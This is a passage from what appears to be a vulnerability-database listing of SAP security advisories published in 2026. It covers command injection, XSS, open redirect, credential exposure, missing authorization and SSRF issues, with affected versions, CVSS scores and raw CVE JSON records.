                  "version": "SAP_BASIS 701"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 702"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 731"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 740"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 750"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 751"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 752"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 753"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 754"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 755"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 756"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 757"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 758"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 816"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cp\u003eAn OS Command Injection vulnerability exists in the SAP NetWeaver Application Server for ABAP and ABAP Platform that allows an authenticated attacker with administrative access to execute specially crafted shell commands on the server, bypassing the logging mechanism. This allows the execution of unintended OS commands without detection, potentially impacting the integrity and availability of the application, with no impact on confidentiality.\u003c/p\u003e"
                }
              ],
              "value": "An OS Command Injection vulnerability exists in the SAP NetWeaver Application Server for ABAP and ABAP Platform that allows an authenticated attacker with administrative access to execute specially crafted shell commands on the server, bypassing the logging mechanism. This allows the execution of unintended OS commands without detection, potentially impacting the integrity and availability of the application, with no impact on confidentiality."
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "HIGH",
                "baseScore": 6.5,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "NONE",
                "integrityImpact": "HIGH",
                "privilegesRequired": "HIGH",
                "scope": "UNCHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-77",
                  "description": "CWE-77: Improper Neutralization of Special Elements used in a Command",
                  "lang": "eng",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-05-12T02:21:40.780Z",
            "orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
            "shortName": "sap"
          },
          "references": [
            {
              "url": "https://me.sap.com/notes/3730019"
            },
            {
              "url": "https://url.sap/sapsecuritypatchday"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "OS Command Injection vulnerability in SAP NetWeaver Application Server for ABAP and ABAP Platform",
          "x_generator": {
            "engine": "Vulnogram 1.0.2"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
        "assignerShortName": "sap",
        "cveId": "CVE-2026-40135",
        "datePublished": "2026-05-12T02:21:40.780Z",
        "dateReserved": "2026-04-09T17:29:44.663Z",
        "dateUpdated": "2026-05-12T13:03:50.003Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-27682 (GCVE-0-2026-27682)

    Vulnerability from nvd – Published: 2026-05-12 02:19 – Updated: 2026-05-12 13:09
    VLAI
    Title
    Reflected Cross-Site Scripting (XSS) vulnerability in SAP NetWeaver Application Server ABAP (Applications based on Business Server Pages)
    Summary
    Due to a reflected cross-site scripting (XSS) vulnerability in SAP NetWeaver Application Server ABAP (Applications based on Business Server Pages), an unauthenticated attacker could craft a URL that exploits an unprotected URL parameter to embed a malicious script. If a victim clicks the link, the injected input is processed during web page generation, resulting in the execution of malicious content in the victim�s browser context. This could allow the attacker to access and/or modify information, impacting the confidentiality and integrity of the application, with no impact to availability.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-79 - Improper Neutralization of Input During Web Page Generation
    Assigner
    sap
    Impacted products
    Vendor Product Version
    SAP_SE SAP NetWeaver Application Server ABAP (Applications based on Business Server Pages) Affected: SAP_BASIS 700
    Affected: SAP_BASIS 701
    Affected: SAP_BASIS 702
    Affected: SAP_BASIS 731
    Affected: SAP_BASIS 740
    Affected: SAP_BASIS 750
    Affected: SAP_BASIS 751
    Affected: SAP_BASIS 752
    Affected: SAP_BASIS 753
    Affected: SAP_BASIS 754
    Affected: SAP_BASIS 755
    Affected: SAP_BASIS 756
    Affected: SAP_BASIS 757
    Affected: SAP_BASIS 758
    Affected: SAP_BASIS 816
    Affected: SAP_BASIS 918
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-27682",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-05-12T13:09:32.945260Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-05-12T13:09:40.621Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "SAP NetWeaver Application Server ABAP (Applications based on Business Server Pages)",
              "vendor": "SAP_SE",
              "versions": [
                {
                  "status": "affected",
                  "version": "SAP_BASIS 700"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 701"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 702"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 731"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 740"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 750"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 751"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 752"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 753"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 754"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 755"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 756"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 757"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 758"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 816"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 918"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cp\u003eDue to a reflected cross-site scripting (XSS) vulnerability in SAP NetWeaver Application Server ABAP (Applications based on Business Server Pages), an unauthenticated attacker could craft a URL that exploits an unprotected URL parameter to embed a malicious script. If a victim clicks the link, the injected input is processed during web page generation, resulting in the execution of malicious content in the victim\ufffds browser context. This could allow the attacker to access and/or modify information, impacting the confidentiality and integrity of the application, with no impact to availability.\u003c/p\u003e"
                }
              ],
              "value": "Due to a reflected cross-site scripting (XSS) vulnerability in SAP NetWeaver Application Server ABAP (Applications based on Business Server Pages), an unauthenticated attacker could craft a URL that exploits an unprotected URL parameter to embed a malicious script. If a victim clicks the link, the injected input is processed during web page generation, resulting in the execution of malicious content in the victim\ufffds browser context. This could allow the attacker to access and/or modify information, impacting the confidentiality and integrity of the application, with no impact to availability."
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 4.7,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-79",
                  "description": "CWE-79: Improper Neutralization of Input During Web Page Generation",
                  "lang": "eng",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-05-12T02:19:26.976Z",
            "orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
            "shortName": "sap"
          },
          "references": [
            {
              "url": "https://me.sap.com/notes/3728690"
            },
            {
              "url": "https://url.sap/sapsecuritypatchday"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Reflected Cross-Site Scripting (XSS) vulnerability in SAP NetWeaver Application Server ABAP (Applications based on Business Server Pages)",
          "x_generator": {
            "engine": "Vulnogram 1.0.2"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
        "assignerShortName": "sap",
        "cveId": "CVE-2026-27682",
        "datePublished": "2026-05-12T02:19:26.976Z",
        "dateReserved": "2026-02-23T17:50:17.027Z",
        "dateUpdated": "2026-05-12T13:09:40.621Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-34262 (GCVE-0-2026-34262)

    Vulnerability from nvd – Published: 2026-04-14 00:09 – Updated: 2026-04-29 19:32
    VLAI
    Title
    Information Disclosure Vulnerability in SAP HANA Cockpit and HANA Database Explorer
    Summary
    Information Disclosure Vulnerability in SAP HANA Cockpit and HANA Database Explorer
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-522 - Insufficiently Protected Credentials
    Assigner
    sap
    Impacted products
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-34262",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-04-14T12:53:11.415883Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-04-14T13:14:17.275Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          },
          {
            "providerMetadata": {
              "dateUpdated": "2026-04-29T19:32:17.156Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "url": "http://seclists.org/fulldisclosure/2026/Apr/16"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "SAP HANA Cockpit and HANA Database Explorer",
              "vendor": "SAP_SE",
              "versions": [
                {
                  "status": "affected",
                  "version": "SAP_HANA_COCKPIT 2.0"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cp\u003eInformation Disclosure Vulnerability in SAP HANA Cockpit and HANA Database Explorer\u003c/p\u003e"
                }
              ],
              "value": "Information Disclosure Vulnerability in SAP HANA Cockpit and HANA Database Explorer"
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 5,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "integrityImpact": "NONE",
                "privilegesRequired": "LOW",
                "scope": "CHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-522",
                  "description": "CWE-522: Insufficiently Protected Credentials",
                  "lang": "eng",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-04-14T00:09:03.364Z",
            "orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
            "shortName": "sap"
          },
          "references": [
            {
              "url": "https://me.sap.com/notes/3730639"
            },
            {
              "url": "https://url.sap/sapsecuritypatchday"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Information Disclosure Vulnerability in SAP HANA Cockpit and HANA Database Explorer",
          "x_generator": {
            "engine": "Vulnogram 1.0.1"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
        "assignerShortName": "sap",
        "cveId": "CVE-2026-34262",
        "datePublished": "2026-04-14T00:09:03.364Z",
        "dateReserved": "2026-03-26T19:02:45.983Z",
        "dateUpdated": "2026-04-29T19:32:17.156Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-34257 (GCVE-0-2026-34257)

    Vulnerability from nvd – Published: 2026-04-14 00:08 – Updated: 2026-04-14 13:14
    VLAI
    Title
    Open Redirect vulnerability in SAP NetWeaver Application Server ABAP
    Summary
    Due to an Open Redirect vulnerability in SAP NetWeaver Application Server ABAP, an unauthenticated attacker could craft malicious URL that, if accessed by a victim, they could be redirected to the page controlled by the attacker. This causes low impact on confidentiality and integrity of the application with no impact on availability.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-601 - URL Redirection to Untrusted Site
    Assigner
    sap
    Impacted products
    Vendor Product Version
    SAP_SE SAP NetWeaver Application Server ABAP Affected: SAP_BASIS 700
    Affected: SAP_BASIS 701
    Affected: SAP_BASIS 702
    Affected: SAP_BASIS 731
    Affected: SAP_BASIS 740
    Affected: SAP_BASIS 750
    Affected: SAP_BASIS 752
    Affected: SAP_BASIS 753
    Affected: SAP_BASIS 754
    Affected: SAP_BASIS 755
    Affected: SAP_BASIS 756
    Affected: SAP_BASIS 757
    Affected: SAP_BASIS 758
    Affected: SAP_BASIS 816
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-34257",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "partial"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-04-14T12:53:41.554329Z",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-04-14T13:14:17.620Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "SAP NetWeaver Application Server ABAP",
              "vendor": "SAP_SE",
              "versions": [
                {
                  "status": "affected",
                  "version": "SAP_BASIS 700"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 701"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 702"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 731"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 740"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 750"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 752"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 753"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 754"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 755"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 756"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 757"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 758"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 816"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cp\u003eDue to an Open Redirect vulnerability in SAP NetWeaver Application Server ABAP, an unauthenticated attacker could craft malicious URL that, if accessed by a victim, they could be redirected to the page controlled by the attacker. This causes low impact on confidentiality and integrity of the application with no impact on availability.\u003c/p\u003e"
                }
              ],
              "value": "Due to an Open Redirect vulnerability in SAP NetWeaver Application Server ABAP, an unauthenticated attacker could craft malicious URL that, if accessed by a victim, they could be redirected to the page controlled by the attacker. This causes low impact on confidentiality and integrity of the application with no impact on availability."
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 6.1,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-601",
                  "description": "CWE-601: URL Redirection to Untrusted Site",
                  "lang": "eng",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-04-14T00:08:39.814Z",
            "orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
            "shortName": "sap"
          },
          "references": [
            {
              "url": "https://me.sap.com/notes/3692004"
            },
            {
              "url": "https://url.sap/sapsecuritypatchday"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Open Redirect vulnerability in SAP NetWeaver Application Server ABAP",
          "x_generator": {
            "engine": "Vulnogram 1.0.1"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
        "assignerShortName": "sap",
        "cveId": "CVE-2026-34257",
        "datePublished": "2026-04-14T00:08:39.814Z",
        "dateReserved": "2026-03-26T19:02:45.982Z",
        "dateUpdated": "2026-04-14T13:14:17.620Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-27674 (GCVE-0-2026-27674)

    Vulnerability from nvd – Published: 2026-04-14 00:06 – Updated: 2026-04-15 03:58
    VLAI
    Title
    Code Injection vulnerability in SAP NetWeaver Application Server Java (Web Dynpro Java)
    Summary
    Due to a Code Injection vulnerability in SAP NetWeaver Application Server Java (Web Dynpro Java), an unauthenticated attacker could supply crafted input that is interpreted by the application and causes it to reference attacker-controlled content. If a victim accesses the affected functionality, that attacker-controlled content could be executed in the victim�s browser, potentially resulting in session compromise. This could allow the attacker to execute arbitrary client-side code, impacting the confidentiality and integrity of the application, with no impact to availability.
    SSVC
    Exploitation: none Automatable: no Technical Impact: total
    CISA Coordinator (v2.0.3)
    CWE
    • CWE-94 - Improper Control of Generation of Code
    Assigner
    sap
    Impacted products
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-27674",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "total"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-04-14T00:00:00+00:00",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-04-15T03:58:11.103Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "SAP NetWeaver Application Server Java (Web Dynpro Java)",
              "vendor": "SAP_SE",
              "versions": [
                {
                  "status": "affected",
                  "version": "WD-RUNTIME 7.50"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cp\u003eDue to a Code Injection vulnerability in SAP NetWeaver Application Server Java (Web Dynpro Java), an unauthenticated attacker could supply crafted input that is interpreted by the application and causes it to reference attacker-controlled content. If a victim accesses the affected functionality, that attacker-controlled content could be executed in the victim\ufffds browser, potentially resulting in session compromise. This could allow the attacker to execute arbitrary client-side code, impacting the confidentiality and integrity of the application, with no impact to availability.\u003c/p\u003e"
                }
              ],
              "value": "Due to a Code Injection vulnerability in SAP NetWeaver Application Server Java (Web Dynpro Java), an unauthenticated attacker could supply crafted input that is interpreted by the application and causes it to reference attacker-controlled content. If a victim accesses the affected functionality, that attacker-controlled content could be executed in the victim\ufffds browser, potentially resulting in session compromise. This could allow the attacker to execute arbitrary client-side code, impacting the confidentiality and integrity of the application, with no impact to availability."
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 6.1,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-94",
                  "description": "CWE-94: Improper Control of Generation of Code",
                  "lang": "eng",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-04-14T00:06:50.301Z",
            "orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
            "shortName": "sap"
          },
          "references": [
            {
              "url": "https://me.sap.com/notes/3719397"
            },
            {
              "url": "https://url.sap/sapsecuritypatchday"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Code Injection vulnerability in SAP NetWeaver Application Server Java (Web Dynpro Java)",
          "x_generator": {
            "engine": "Vulnogram 1.0.1"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
        "assignerShortName": "sap",
        "cveId": "CVE-2026-27674",
        "datePublished": "2026-04-14T00:06:50.301Z",
        "dateReserved": "2026-02-23T17:50:10.513Z",
        "dateUpdated": "2026-04-15T03:58:11.103Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-27688 (GCVE-0-2026-27688)

    Vulnerability from nvd – Published: 2026-03-10 00:18 – Updated: 2026-03-11 03:56
    VLAI
    Title
    Missing Authorization check in SAP NetWeaver Application Server for ABAP
    Summary
    Due to a missing authorization check in SAP NetWeaver Application Server for ABAP, an authenticated attacker with user privileges could read Database Analyzer Log Files via a specific RFC function module. The attacker with the necessary privileges to execute this function module could potentially escalate their privileges and read the sensitive data, resulting in a limited impact on the confidentiality of the information stored. However, the integrity and availability of the system are not affected.
    SSVC
    Exploitation: none Automatable: no Technical Impact: total
    CISA Coordinator (v2.0.3)
    CWE
    Assigner
    sap
    Impacted products
    Vendor Product Version
    SAP_SE SAP NetWeaver Application Server for ABAP Affected: SAP_BASIS 700
    Affected: SAP_BASIS 701
    Affected: SAP_BASIS 702
    Affected: SAP_BASIS 710
    Affected: SAP_BASIS 711
    Affected: SAP_BASIS 730
    Affected: SAP_BASIS 731
    Affected: SAP_BASIS 740
    Affected: SAP_BASIS 750
    Affected: SAP_BASIS 751
    Affected: SAP_BASIS 752
    Affected: SAP_BASIS 753
    Affected: SAP_BASIS 754
    Affected: SAP_BASIS 755
    Affected: SAP_BASIS 756
    Affected: SAP_BASIS 757
    Affected: SAP_BASIS 758
    Affected: SAP_BASIS 816
    Create a notification for this product.
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "metrics": [
              {
                "other": {
                  "content": {
                    "id": "CVE-2026-27688",
                    "options": [
                      {
                        "Exploitation": "none"
                      },
                      {
                        "Automatable": "no"
                      },
                      {
                        "Technical Impact": "total"
                      }
                    ],
                    "role": "CISA Coordinator",
                    "timestamp": "2026-03-10T00:00:00+00:00",
                    "version": "2.0.3"
                  },
                  "type": "ssvc"
                }
              }
            ],
            "providerMetadata": {
              "dateUpdated": "2026-03-11T03:56:30.241Z",
              "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
              "shortName": "CISA-ADP"
            },
            "title": "CISA ADP Vulnrichment"
          }
        ],
        "cna": {
          "affected": [
            {
              "defaultStatus": "unaffected",
              "product": "SAP NetWeaver Application Server for ABAP",
              "vendor": "SAP_SE",
              "versions": [
                {
                  "status": "affected",
                  "version": "SAP_BASIS 700"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 701"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 702"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 710"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 711"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 730"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 731"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 740"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 750"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 751"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 752"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 753"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 754"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 755"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 756"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 757"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 758"
                },
                {
                  "status": "affected",
                  "version": "SAP_BASIS 816"
                }
              ]
            }
          ],
          "descriptions": [
            {
              "lang": "en",
              "supportingMedia": [
                {
                  "base64": false,
                  "type": "text/html",
                  "value": "\u003cp\u003eDue to a missing authorization check in SAP NetWeaver Application Server for ABAP, an authenticated attacker with user privileges could read Database Analyzer Log Files via a specific RFC function module. The attacker with the necessary privileges to execute this function module could potentially escalate their privileges and read the sensitive data, resulting in a limited impact on the confidentiality of the information stored. However, the integrity and availability of the system are not affected.\u003c/p\u003e"
                }
              ],
              "value": "Due to a missing authorization check in SAP NetWeaver Application Server for ABAP, an authenticated attacker with user privileges could read Database Analyzer Log Files via a specific RFC function module. The attacker with the necessary privileges to execute this function module could potentially escalate their privileges and read the sensitive data, resulting in a limited impact on the confidentiality of the information stored. However, the integrity and availability of the system are not affected."
            }
          ],
          "metrics": [
            {
              "cvssV3_1": {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "availabilityImpact": "NONE",
                "baseScore": 5,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "integrityImpact": "NONE",
                "privilegesRequired": "LOW",
                "scope": "CHANGED",
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N",
                "version": "3.1"
              },
              "format": "CVSS",
              "scenarios": [
                {
                  "lang": "en",
                  "value": "GENERAL"
                }
              ]
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-862",
                  "description": "CWE-862: Missing Authorization",
                  "lang": "eng",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2026-03-10T00:18:55.986Z",
            "orgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
            "shortName": "sap"
          },
          "references": [
            {
              "url": "https://me.sap.com/notes/3704740"
            },
            {
              "url": "https://url.sap/sapsecuritypatchday"
            }
          ],
          "source": {
            "discovery": "UNKNOWN"
          },
          "title": "Missing Authorization check in SAP NetWeaver Application Server for ABAP",
          "x_generator": {
            "engine": "Vulnogram 1.0.0"
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "e4686d1a-f260-4930-ac4c-2f5c992778dd",
        "assignerShortName": "sap",
        "cveId": "CVE-2026-27688",
        "datePublished": "2026-03-10T00:18:55.986Z",
        "dateReserved": "2026-02-23T17:50:17.028Z",
        "dateUpdated": "2026-03-11T03:56:30.241Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }

    CVE-2026-24316 (GCVE-0-2026-24316)

    Vulnerability from nvd – Published: 2026-03-10 00:17 – Updated: 2026-03-10 16:53
    VLAI
    Title
    Server-Side Request Forgery (SSRF) in SAP NetWeaver Application Server for ABAP
    Summary
    SAP NetWeaver Application Server for ABAP provides an ABAP Report for testing purposes, which allows to send HTTP requests to arbitrary internal or external endpoints. The report is therefore vulnerable to Server-Side Request Forgery (SSRF). Successful exploitation could lead to interaction with potentially sensitive internal endpoints, resulting in a low impact on data confidentiality and integrity. There is no impact on availability of the application.
    SSVC
    Exploitation: none Automatable: no Technical Impact: partial
